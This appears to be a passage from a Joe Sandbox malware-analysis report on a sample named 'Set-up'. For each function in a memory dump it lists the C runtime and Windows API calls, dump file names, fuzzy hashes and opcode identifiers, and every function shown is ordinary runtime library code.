Instruction Fuzzy Hash: 3331F332404BD08ADB315F39C841B5AB7F4EF077A8B108A5DD4B58A5A0E73CE9468F84

Function 6BB76D24 Relevance: 12.1, APIs: 8, Instructions: 100COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002), ref: 6BB76D8E
_get_osfhandle.MSVCR100(?,00000000), ref: 6BB76D98
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 6BB76D9F
DuplicateHandle.KERNEL32(00000000), ref: 6BB76DA6

Part of subcall function 6BB6A78A: _get_osfhandle.MSVCR100(?,?,?,?,6BB6A865,?,6BB6A880,00000010), ref: 6BB6A795
Part of subcall function 6BB6A78A: _get_osfhandle.MSVCR100(?), ref: 6BB6A7B8
Part of subcall function 6BB6A78A: CloseHandle.KERNEL32(00000000), ref: 6BB6A7BF

_errno.MSVCR100 ref: 6BB90539
__doserrno.MSVCR100 ref: 6BB90544

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
String ID:
API String ID: 4219055303-0
Opcode ID: 5eb351995ce138d67f532497bd70e53d2b8c853dbb81da2acd77c1165e98f3b2
Instruction ID: 27b5aa4bd054fd2d45a599337adf50a277a5d2b32c0ba80417e657128dcd57ce
Opcode Fuzzy Hash: 5eb351995ce138d67f532497bd70e53d2b8c853dbb81da2acd77c1165e98f3b2
Instruction Fuzzy Hash: 38310532504285AFDB01CF78C884E993BF5EF0A318F1501A9E5148F2A1EB75EA00CB60

Function 6BB6FA37 Relevance: 12.1, APIs: 8, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

APIs

__crtCompareStringW.MSVCR100(?,00001001,00000000,?,?,?,?), ref: 6BB75F76
_errno.MSVCR100 ref: 6BB8C752
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8C75D
_errno.MSVCR100 ref: 6BB8C76C
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8C777
_errno.MSVCR100 ref: 6BB8C786
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8C791

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$CompareString__crt
String ID:
API String ID: 380063240-0
Opcode ID: b211c554b537cf239ba6c6cd4712025158d797d520ee2420003e00b4f6839abd
Instruction ID: 640e82754ec47d90295782ff9a4deb67e83583ec03512eaad278fedacda831db
Opcode Fuzzy Hash: b211c554b537cf239ba6c6cd4712025158d797d520ee2420003e00b4f6839abd
Instruction Fuzzy Hash: 4631C2B56002D59BDB205E79C8817BE36A6EB017A4F540295E870DB2D0FB7CCD40DBE1

Function 6BB64B95 Relevance: 12.1, APIs: 8, Instructions: 97stringCOMMON

Download Yara Rule

APIs

_getptd.MSVCR100(?,?,?,?,?,?,?,6BB64CC0,00000014), ref: 6BB64BAF

Part of subcall function 6BB64E90: _getptd.MSVCR100(6BB64EF0,0000000C,6BB89FD5,?,?,6BB69233,?), ref: 6BB64E9C
Part of subcall function 6BB64E90: _lock.MSVCR100(0000000C), ref: 6BB64EB3

_calloc_crt.MSVCR100(000000D8,00000001), ref: 6BB64BCF
_lock.MSVCR100(0000000C), ref: 6BB64BE5

Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E

__copytlocinfo_nolock.LIBCMT ref: 6BB64BF3

Part of subcall function 6BB6497A: _unlock.MSVCR100(0000000C,6BB64C01), ref: 6BB6497C

Part of subcall function 6BB64DDA: __expandlocale.LIBCMT ref: 6BB64E34
Part of subcall function 6BB64DDA: strcmp.MSVCR100(?,00000048,?,?,?,00000001,00000000,00000000), ref: 6BB64E50

strcmp.MSVCR100(00000000,6BC039A0), ref: 6BB64C28
_lock.MSVCR100(0000000C), ref: 6BB64C39
_errno.MSVCR100(?,?,?,?,?,?,?,6BB64CC0,00000014), ref: 6BB90C98
_invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,6BB64CC0,00000014), ref: 6BB90CA3

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _lock$_getptdstrcmp$CriticalEnterSection__copytlocinfo_nolock__expandlocale_calloc_crt_errno_invalid_parameter_noinfo_unlock
String ID:
API String ID: 2630553387-0
Opcode ID: 0b417cad21f35aec09b6ef096b594c5ff1b49930d979d25ffd48705787865019
Instruction ID: bd9a97f26dde455b478f3ca6b5c19d6c9bc0813c78ca3e8d7ac3ca0e9e9d2455
Opcode Fuzzy Hash: 0b417cad21f35aec09b6ef096b594c5ff1b49930d979d25ffd48705787865019
Instruction Fuzzy Hash: 1F31DE71908B84EEEB149FB4D856B9C77F0AF89398F10855ED40957380FBBD8E40CA25

Function 6BB6B2A9 Relevance: 12.1, APIs: 8, Instructions: 86stringCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT(00000000,?,?,6BB6B286), ref: 6BB6B2C5
_calloc_crt.MSVCR100(00000001,00000004,?,?,6BB6B286), ref: 6BB6B2D5
_strlen.LIBCMT(00000000,?,?,?,6BB6B286), ref: 6BB6B2FC
_calloc_crt.MSVCR100(00000001,00000001,?,?,?,6BB6B286), ref: 6BB6B30D
strcpy_s.MSVCR100(00000000,00000001,00000000,?,?,?,6BB6B286), ref: 6BB6B321
free.MSVCR100(?,?,?,6BB6B286), ref: 6BB6B33E

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _calloc_crt_strlen$freestrcpy_s
String ID:
API String ID: 1972913904-0
Opcode ID: 4a6506466fc531fb1ff6f7dbf1cd379ea9387cca2686a209c41de9a2cd7050d2
Instruction ID: 68244346960e3ce5918db7086c3a295d1420ea149801c4713e83feb2a78fe153
Opcode Fuzzy Hash: 4a6506466fc531fb1ff6f7dbf1cd379ea9387cca2686a209c41de9a2cd7050d2
Instruction Fuzzy Hash: BE21F9B38095D15BEB314B799C42B5B2BF8EB927E8F150549F46453080FB7EDE838650

Function 6BB710E3 Relevance: 12.1, APIs: 8, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcslen.LIBCMT(00000000,?,00000000,6BB90869), ref: 6BB71107
_calloc_crt.MSVCR100(00000001,00000004,?,?,00000000,6BB90869), ref: 6BB71118
_wcslen.LIBCMT(00000000,?,?,00000000,6BB90869), ref: 6BB7113C
_calloc_crt.MSVCR100(00000001,00000002,?,?,00000000,6BB90869), ref: 6BB7114E
wcscpy_s.MSVCR100(00000000,00000001,00000000,?,?,00000000,6BB90869), ref: 6BB71162
free.MSVCR100(?,?,00000000,6BB90869), ref: 6BB71180

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _calloc_crt_wcslen$freewcscpy_s
String ID:
API String ID: 968141106-0
Opcode ID: a11b8af18d8d86b902f006211fda3bfc83fcd27cc0266b46c1232eed4ce0fc96
Instruction ID: 3c1c126e9b3b67944578fcf339fe25db6281c1e3aff6c40c956360de551ca921
Opcode Fuzzy Hash: a11b8af18d8d86b902f006211fda3bfc83fcd27cc0266b46c1232eed4ce0fc96
Instruction Fuzzy Hash: CD21F9335142E196EB315B7A9C45B2633F4DF82778F25016EE4709A0C0EF7DD981C6A1

Function 6BB6AA8C Relevance: 12.1, APIs: 8, Instructions: 76COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(6BC07580,6BB6BD3C,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AAA1
DecodePointer.KERNEL32(?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AAAE
_msize.MSVCR100(00000000,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AACB

Part of subcall function 6BB62231: HeapSize.KERNEL32(00000000,00000000,?,6BB6AAD0,00000000,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC), ref: 6BB6224B

EncodePointer.KERNEL32(?,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AAE7
EncodePointer.KERNEL32(-00000004,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AAEF
_realloc_crt.MSVCR100(00000000,00000800,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB72BAF
EncodePointer.KERNEL32(00000000,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB72BC5

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
String ID:
API String ID: 765448609-0
Opcode ID: 8a922599826056ef7fea20593ec7f0ccdbf39706a745f3dfdad82fafff969bb4
Instruction ID: a263fc818ca65cac99f55e61d9230c74d66da0d07da9a682f4aa083379e7cdb2
Opcode Fuzzy Hash: 8a922599826056ef7fea20593ec7f0ccdbf39706a745f3dfdad82fafff969bb4
Instruction Fuzzy Hash: A711B132604255AFEB116F64DC828CE77FAEB573A1315043EE805E3210FB7AED809B90

Function 6BB62337 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 6BB6234D
InterlockedDecrement.KERNEL32(?), ref: 6BB623B8
InterlockedDecrement.KERNEL32(?), ref: 6BB623C8
InterlockedDecrement.KERNEL32(?), ref: 6BB6933E
InterlockedDecrement.KERNEL32(?), ref: 6BB69347
InterlockedDecrement.KERNEL32(?), ref: 6BB6934F
InterlockedDecrement.KERNEL32(?), ref: 6BB69357

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: DecrementInterlocked
String ID:
API String ID: 3448037634-0
Opcode ID: 37adc6a75efcb5ff0427904141fc2a079989e73a2fc22f2a7130c16e630bcb73
Instruction ID: a4367f10e3e7f4d00d1f7e23b757566d0c479a4fa97ac0fe1bb0bd38457a3b59
Opcode Fuzzy Hash: 37adc6a75efcb5ff0427904141fc2a079989e73a2fc22f2a7130c16e630bcb73
Instruction Fuzzy Hash: 7C114C35F44699AFEB009F69CC84B4AF7ACEF46BD4F044566A918D7141F778EC008BA1

Function 6BB61F13 Relevance: 12.1, APIs: 8, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(00000001), ref: 6BB61F25
InterlockedIncrement.KERNEL32(?), ref: 6BB61F90
InterlockedIncrement.KERNEL32(?), ref: 6BB61F9E
InterlockedIncrement.KERNEL32(?), ref: 6BB62ABC
InterlockedIncrement.KERNEL32(?), ref: 6BB62AC4
InterlockedIncrement.KERNEL32(?), ref: 6BB62ACC
InterlockedIncrement.KERNEL32(?), ref: 6BB62AD4

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: IncrementInterlocked
String ID:
API String ID: 3508698243-0
Opcode ID: 46ee7c0ad8855c0b35328c3267f60aa355734fecf3322f1882ab50ac42dd1bee
Instruction ID: b2305b20a363cba3b184815af2cadb932a08b90933208dde7d9e97168daea02a
Opcode Fuzzy Hash: 46ee7c0ad8855c0b35328c3267f60aa355734fecf3322f1882ab50ac42dd1bee
Instruction Fuzzy Hash: 86115E35F482A9ABEB009F79DC84B4ABBACEF457D4F085462E508D7100F778EC008BA1

Function 6BBD8664 Relevance: 12.1, APIs: 8, Instructions: 59COMMON

Download Yara Rule

APIs

_errno.MSVCR100(6BBD8740,00000010,6BB88C0C,00000000,?), ref: 6BBD8678
_errno.MSVCR100(6BBD8740,00000010,6BB88C0C,00000000,?), ref: 6BBD8697
_invalid_parameter_noinfo.MSVCR100(6BBD8740,00000010,6BB88C0C,00000000,?), ref: 6BBD86A2
_get_osfhandle.MSVCR100(?,6BBD8740,00000010,6BB88C0C,00000000,?), ref: 6BBD86DE
FlushFileBuffers.KERNEL32(00000000,6BBD8740,00000010,6BB88C0C,00000000,?), ref: 6BBD86E5
GetLastError.KERNEL32 ref: 6BBD86EF
__doserrno.MSVCR100 ref: 6BBD8704
_errno.MSVCR100(6BBD8740,00000010,6BB88C0C,00000000,?), ref: 6BBD870E

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$BuffersErrorFileFlushLast__doserrno_get_osfhandle_invalid_parameter_noinfo
String ID:
API String ID: 3018510309-0
Opcode ID: e954b44ad65344c4c80cf73f744f2194a0a698baa1064155f6fb728a781061df
Instruction ID: f1f319512f66ddd047716b908529d1c2b5360821fe3433453242c65e157a5d1f
Opcode Fuzzy Hash: e954b44ad65344c4c80cf73f744f2194a0a698baa1064155f6fb728a781061df
Instruction Fuzzy Hash: 9611B8718003858FDB109FB8CC86B6D7B70AF0236AF511289D4309B2D0EBBDCA408FA1

Function 6BB60698 Relevance: 12.0, APIs: 8, Instructions: 46threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(6BB53238,?,6BB607BA,6BBF7F62), ref: 6BB6069C
__set_flsgetvalue.MSVCR100 ref: 6BB606AA

Part of subcall function 6BB6067B: TlsGetValue.KERNEL32(?,6BB606AF), ref: 6BB60684

SetLastError.KERNEL32(00000000), ref: 6BB606BC
_calloc_crt.MSVCR100(00000001,00000214), ref: 6BB875B7
DecodePointer.KERNEL32(00000000), ref: 6BB875D5
_initptd.MSVCR100(00000000,00000000), ref: 6BB875E4
GetCurrentThreadId.KERNEL32 ref: 6BB875EB

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ErrorLast$CurrentDecodePointerThreadValue__set_flsgetvalue_calloc_crt_initptd
String ID:
API String ID: 242762301-0
Opcode ID: c59437a26d6cbf479fc1824889c3aa4dd82d973b76bc6d3fe4863534aea8fd03
Instruction ID: eb40363abfc7fe3c7748973e37cb0fb4d1a348b7f9fbf6987660cbcc49fdf113
Opcode Fuzzy Hash: c59437a26d6cbf479fc1824889c3aa4dd82d973b76bc6d3fe4863534aea8fd03
Instruction Fuzzy Hash: EBF02D335046B15FD7211FB59D4AA5E7BE0DF86BB07190119F824D3090EF6ACD018AB5

Function 6BB717C4 Relevance: 10.6, APIs: 7, Instructions: 148COMMON

Download Yara Rule

APIs

_fileno.MSVCR100(?), ref: 6BB717DD
_lseek.MSVCR100(00000000,00000000,00000001), ref: 6BB717F5
_errno.MSVCR100 ref: 6BB88D7C
_invalid_parameter_noinfo.MSVCR100 ref: 6BB88D87
_errno.MSVCR100 ref: 6BB88D9C

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_fileno_invalid_parameter_noinfo_lseek
String ID:
API String ID: 1667283477-0
Opcode ID: 7b04b56aed9a1f440a749fd1420696a05e4feb93593f961cca03372dbe421207
Instruction ID: da17fc714405eadbefa015e98292e27d2df1655d7ef3f1cc2f085aead05aa4c2
Opcode Fuzzy Hash: 7b04b56aed9a1f440a749fd1420696a05e4feb93593f961cca03372dbe421207
Instruction Fuzzy Hash: AC51B170E042D9EFDB30AE68C890B497BB1EF46754F1481B9DA359B281D73CDA41CBA1

Function 6BB6DE57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 140COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 6BB8F058
operator+.LIBCMT ref: 6BB8F159

Strings

volatile, xrefs: 6BB8F050, 6BB8F12D
std::nullptr_t, xrefs: 6BB8F113

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Name::operator=operator+
String ID: std::nullptr_t$volatile
API String ID: 1352385710-3726895890
Opcode ID: 4c6dd15655510bd6da545c984db7e8b931db8914dd4628163ed7762f93239706
Instruction ID: 456b4d79b3b56035dda8a1008f8f1fddd61689beeeaf253cd9c5cdf6bd5fa4c4
Opcode Fuzzy Hash: 4c6dd15655510bd6da545c984db7e8b931db8914dd4628163ed7762f93239706
Instruction Fuzzy Hash: 424112319441C9EFDF11AFA8D8819AE7BB4FF1A381F5144A9F9149A251E73ACB40CB50

Function 6BB6B128 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000000,00000001), ref: 6BB6B149
___crtGetStringTypeA.LIBCMT ref: 6BB6B19A
__crtLCMapStringA.MSVCR100(00000000,?,00000100,00000020,00000100,?,00000100,?,00000000,00000000,00000001,00000020,00000100,?,?,?), ref: 6BB6B1BA
__crtLCMapStringA.MSVCR100(00000000,?,00000200,00000020,00000100,?,00000100,?,00000000), ref: 6BB6B1DF

Strings

, xrefs: 6BB6B170

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: String$__crt$InfoType___crt
String ID:
API String ID: 3423027535-3916222277
Opcode ID: f525d857bafda9b3c3383fb1f65d5ec79fc41996fca746deb42a167cd7a821e8
Instruction ID: 65d76fe3d385f4a8331b42532570d587e82cd6622ce58921cec4638c49830cfd
Opcode Fuzzy Hash: f525d857bafda9b3c3383fb1f65d5ec79fc41996fca746deb42a167cd7a821e8
Instruction Fuzzy Hash: F44104705047DC9EDB318F648C85BEB7BF8EB05748F1444E8EA9A86182E2799B458F20

Function 6BB71E41 Relevance: 10.6, APIs: 7, Instructions: 123COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcslen.LIBCMT(00000000,00000000,00000000,00000000,?,6BB773CA,00000000,00000000,00000000,0000003D,?,6BB773E6,74DEDF80,00000000,01821910), ref: 6BB71E57
calloc.MSVCR100(00000001,00000002,00000000,00000000,00000000,00000000,?,6BB773CA,00000000,00000000,00000000,0000003D,?,6BB773E6,74DEDF80,00000000), ref: 6BB71E62
wcscpy_s.MSVCR100(00000000,00000001,00000000,74DEDF80,00000000,01821910), ref: 6BB71E75
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,74DEDF80,00000000,01821910), ref: 6BB89799
_errno.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,74DEDF80,00000000,01821910), ref: 6BB897B0
_invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,74DEDF80,00000000,01821910), ref: 6BB897BA

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __invoke_watson_errno_invalid_parameter_noinfo_wcslencallocwcscpy_s
String ID:
API String ID: 2624155197-0
Opcode ID: f465bf2f3a54c0ef8722b592f7bec246283face6e911eaf62ac90378db1aa1ce
Instruction ID: 07c0e263bcf10991ecf81fcde2f808e7886a56ea4164b88877b2f71486301ca4
Opcode Fuzzy Hash: f465bf2f3a54c0ef8722b592f7bec246283face6e911eaf62ac90378db1aa1ce
Instruction Fuzzy Hash: F6317C3A6247D196DB212E798C8136B33B0EFC1B64B9055BAF9758B641F73DC840C390

Function 6BB7204F Relevance: 10.6, APIs: 7, Instructions: 82COMMONLIBRARYCODE

Download Yara Rule

APIs

_strnicmp_l.MSVCR100(?,74DE8406,?,?,7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB720A9

Part of subcall function 6BB6EFF6: _tolower_l.MSVCR100(00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB6F052
Part of subcall function 6BB6EFF6: _tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB6F061

__crtCompareStringA.MSVCR100(?,?,00001001,?,?,74DE8406,?,00000005,7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?), ref: 6BB762B7
_errno.MSVCR100(00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C496
_invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C4A1
_errno.MSVCR100(7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C4BC
_invalid_parameter_noinfo.MSVCR100(7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C4C7
_errno.MSVCR100(?,?,?,?,?,7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C4CE

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo_tolower_l$CompareString__crt_strnicmp_l
String ID:
API String ID: 1585791229-0
Opcode ID: 9b1677c3a0dbee3850117fea866f7573ad8c888ba7fc4c2c3e7d7e1ec0c9ab71
Instruction ID: 767e1e74659f209225dcb58bdd63110fc14bb7cddd5752c5df8ebf7224de5d16
